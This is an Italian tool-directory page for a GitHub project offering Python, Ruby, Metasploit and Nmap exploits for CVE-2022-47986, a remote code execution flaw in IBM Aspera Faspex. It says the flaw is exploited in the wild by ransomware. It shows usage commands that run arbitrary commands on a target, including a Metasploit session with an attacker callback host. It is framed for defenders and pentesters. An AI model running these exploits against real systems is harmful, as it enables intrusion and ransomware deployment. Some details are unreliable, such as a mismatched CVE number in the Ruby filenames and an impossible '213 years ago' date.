Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2022-47986 — CVE-2022-47986: moduli Python, Ruby, NMAP e Metasploit per sfruttare la vulnerabilità. | Kitploit
Strumenti/GitHubGitHub/mauricelambert/cve-2022-47986
Framework di ExploitExploitSfruttamento di Applicazioni Web
GitHubmauricelambert/cve-2022-47986

CVE-2022-47986

CVE-2022-47986: moduli Python, Ruby, NMAP e Metasploit per sfruttare la vulnerabilità.

Vedi Repository
213 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2022-47986

Perché

Questa vulnerabilità viene sfruttata in the wild. IceFire usa questa vulnerabilità per distribuire il ransomware sui sistemi presi di mira; vorrei aiutare i team SOC/Blue a identificare i sistemi interessati e i Pentester/Red team a sfruttarla e segnalarla.

Descrizione

Propongo script puri in Python e Ruby, moduli per Metasploit e Nmap per sfruttare la vulnerabilità che causa una RCE (Esecuzione Remota di Codice) su IBM Aspera Faspex tramite deserializzazione YAML.

Exploit: RCE (Esecuzione Remota di Codice)

Python

root@kitploit:~
python3 CVE-2022-47986.py <target> <command>
# OR
chmod u+x CVE-2022-47986.py
./CVE-2022-47986.py https://aspera.faspax.local id

Ruby

root@kitploit:~
ruby CVE-2021-31166.rb
ruby CVE-2021-31166.rb <hostname> -c <command>
ruby CVE-2021-31166.rb aspera.faspax.local -c id

Metasploit

root@kitploit:~
msf6 > use exploit/linux/http/ibm_aspera_faspex_rce_yaml_deserialization 
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > set RHOST 10.10.10.10
RHOST => 10.10.10.10
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > set LHOST 192.168.77.139
LHOST => 192.168.77.139
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > exploit

Nmap

root@kitploit:~
nmap -p 443 --script ibm-aspera-faspex-rce 172.17.0.2
nmap -p 443 --script ibm-aspera-faspex-rce --script-args "command=id" 172.17.0.2

Fonti

  • IBM
  • nvd.nist.gov
  • Blog - Exploit
  • thehackernews - sfruttata da icefire
  • thehackernews - catalogo CISA KEV

Licenza

Licenziato sotto la GPL, versione 3.

Scarica lo strumento